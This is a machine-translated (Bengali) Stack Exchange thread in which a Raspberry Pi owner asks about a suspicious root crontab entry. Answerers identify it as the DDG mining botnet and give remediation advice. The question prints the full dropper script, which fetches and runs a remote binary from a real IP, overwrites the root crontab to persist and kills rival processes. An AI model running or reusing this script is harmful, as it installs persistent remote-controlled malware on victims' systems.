সন্দেহজনক ক্রন্টব এন্ট্রি প্রতি 15 মিনিটে 'xribfa4' চলছে


59

আমি আমার রাস্পবেরি পাইতে আমার রুট ক্রন্টব ফাইলটিতে কিছু যুক্ত করতে চেয়েছিলাম এবং এমন একটি এন্ট্রি পেয়েছি যা আমার কাছে সন্দেহজনক বলে মনে হয়, গুগলে এর কিছু অংশ অনুসন্ধান করে কিছুই পাওয়া যায় নি।

ক্রন্টব এন্ট্রি:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

বিষয়বস্তু হ'ল http://103.219.112.66:8000/i.sh:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

আমার লিনাক্স জ্ঞান সীমিত তবে আমার কাছে মনে হয় ইন্দোনেশিয়ান সার্ভার থেকে বাইনারিগুলি ডাউনলোড করা এবং সেগুলি নিয়মিত রুট হিসাবে চালানো সাধারণ জিনিস নয়।

এটা কি? আমার কি করা উচিৎ?


16
এটি বিজ্ঞপ্তি। প্রতি 15 মিনিটে এটি ডাউনলোড করে এবং এটির একটি নতুন কপি ইনস্টল করে। যদি / যখন রিমোট সার্ভারে অনুলিপি পরিবর্তন করা হয়, এই ক্রোনজব চালিত সমস্ত সার্ভারগুলি 15 মিনিটের মধ্যে নতুন কোড যাই হোক না কেন কার্যকর করবে।
ওয়াইল্ডকার্ড

5
আপনার রাস্পবেরি পাই ইন্টারনেট খোলা আছে? আপনার রাস্পবেরি পাই কি চলছে? গুগলে এইমাত্র ফলাফল যখন আমি xribfa4 অনুসন্ধান করি। আপনি যদি এমন সফ্টওয়্যার না চালাচ্ছেন যা এটি করার প্রয়োজন হয় তবে এটি সম্ভবত একটি ভাইরাস।
কেমোটেপ

6
@ কেমোটেপ এই স্ট্রিংটি এলোমেলো, তবে আইপি-র জন্য গুগল এবং এটি কয়েকটি ফলাফল দেয়। ডিডিজি মাইনিং বোটনেট সম্পর্কে কিছু
frostschutz

9
আমি এটি খুঁজে পেয়েছি। এটি উন্মাদ যে আইপি ইন্দোনেশিয়ার সরকারী সাইটে নিবন্ধিত হয়েছে। দেখতে আরও প্রায় 2000 টি আইপিস রয়েছে যা এই পেলোডটি সরবরাহ করে।
কেমোটেপ

21
আপনার অবশ্যই সচেতন হওয়া উচিত প্রধান বিষয় হ'ল আপনি যদি সেই ক্রন্টব এন্ট্রি অপসারণ করেন তবে আপনার সিস্টেমে সম্ভবত এখনও দুর্বলতা রয়েছে যা এটি সংক্রামিত হতে দিয়েছে। আপনার সেই দুর্বলতাটি খুঁজে বের করতে হবে এবং এটি ঠিক করতে হবে।
হ্যান্স-মার্টিন মোসনার 21

উত্তর:


79

এটি একটি ডিডিজি মাইনিং বোটনেট, এটি কীভাবে কাজ করে:

  1. একটি আরসিই দুর্বলতা কাজে লাগানো
  2. ক্রোনট্যাব পরিবর্তন করা হচ্ছে
  3. উপযুক্ত খনির প্রোগ্রাম ডাউনলোড করা (গো দিয়ে লেখা)
  4. খনির প্রক্রিয়া শুরু

ডিডিজি: ডেটাবেস সার্ভারে একটি মাইনিং বোটনেট লক্ষ্য

সিস্টেমডমিনার যখন কোনও বোটনেট অন্য বোটনেটের পরিকাঠামো ধার করে

U&L: আমি কীভাবে AWS ইসি 2 উদাহরণে মিনিয়ার্ড ম্যালওয়্যারকে হত্যা করতে পারি? (আপোস করা সার্ভার)


4
হ্যাঁ, বাস্তবে মনে হয় এটি এটি। ধন্যবাদ! এটিকে উত্তর হিসাবে চিহ্নিত করবে, যদি নতুন কিছু না আসে।
পিটার বাঁধ 22

8
মূলযুক্ত মেশিনের জন্য সাধারণ পরামর্শটি ভুলে যাবেন না: চেষ্টা করুন এবং তারা কীভাবে প্রবেশ করেছে তা নির্ধারণ করুন যাতে আপনি গর্তটি ঠিক করতে পারেন। এ থেকে শিখুন এবং আপনার সুরক্ষা বাড়ান। অবশেষে, মেশিনটি নুকে এবং পুনরায় ইনস্টল করুন।
মার্সেলেম

3
সুসংবাদটি হ'ল কেবল পাই 68686 এবং x86_64 এর জন্য পাইয়ের জন্য তাদের কোনও খনিতে উপস্থিত হবে না।
চিহ্নিত করুন

13
@ মার্ক কীভাবে এটি সুসংবাদ? কেউ অজানা এন্ট্রি পয়েন্টটি ব্যবহার করে তার পাইয়ের উপর সম্পূর্ণ নিয়ন্ত্রণ অর্জন করেছে এবং পাইয়ের কোনও গোপনীয়তার (পুরোপুরি পাসওয়ার্ড সহ তবে সীমাবদ্ধ নয়) সম্পূর্ণ অ্যাক্সেস পেয়েছিল। মাইনার রান করে কিনা তা সত্যিই "ছোট অসুবিধা" এর রাজ্যে রয়েছে।
মার্সেলেম

4
@ মার্সেলম, আক্রমণকারী এটির উপরে সম্পূর্ণ নিয়ন্ত্রণ অর্জন করেছিল এবং তারপরে অবশ্যই সেই নিয়ন্ত্রণের সাথে উল্লেখযোগ্য কোনও কিছুই করতে পারেনি।
চিহ্নিত করুন

2

কোন টিসিপি এবং ইউডিপি বন্দরগুলি আসলে প্রয়োজন তা নির্ধারণ করুন এবং তারপরে আপনার রাউটারের ফায়ারওয়ালের অন্যান্য সমস্ত পোর্টকে অবরুদ্ধ করুন। সম্ভবত , সেই ক্রন্টব এন্ট্রি আবার প্রদর্শিত হবে না।

শিল্ড আপ ব্যবহার করে আপনি দেখতে পারবেন কোন বন্দরগুলি উন্মুক্ত এবং সর্বজনীন ! grc.com এ বৈশিষ্ট্য


5
বা তিনি দুর্বলতা প্যাচ করতে পারে।
হার্পার -

1
নিখুঁতভাবে! এটি একটি প্রদত্ত আমি ভাবছিলাম যে সম্ভবত অব্যবহৃত বন্দরগুলি প্রথমে অবরুদ্ধ না করে, তিনি প্যাচ করার চেষ্টা করার সময় এটি পুনরায় সংক্রামিত হতে পারে।
মাইক ওয়াটারস

1
Security.SE থেকে প্রাসঙ্গিক মন্তব্য: security.stackexchange.com/questions/147770/...
ওয়াইল্ডকার্ড

1
এটি (কেবলমাত্র টিসিপি এবং ইউডিপিতে সীমাবদ্ধ নয়), সর্বদা। আকা পজিটিভ সিকিউরিটি মডেল, শ্বেতলিস্ট বা ডিফল্ট অস্বীকার করুন - আপনার স্পষ্টভাবে ব্যবহার বা প্রয়োজন হয় না এমন সমস্ত ট্র্যাফিককে অস্বীকার করুন - আপনার কোনও ছিদ্র অনুপ্রবেশের সংস্পর্শে না আসার একমাত্র উপায়।
এন্টিক্রিস
আমাদের সাইট ব্যবহার করে, আপনি স্বীকার করেছেন যে আপনি আমাদের কুকি নীতি এবং গোপনীয়তা নীতিটি পড়েছেন এবং বুঝতে পেরেছেন ।
Licensed under cc by-sa 3.0 with attribution required.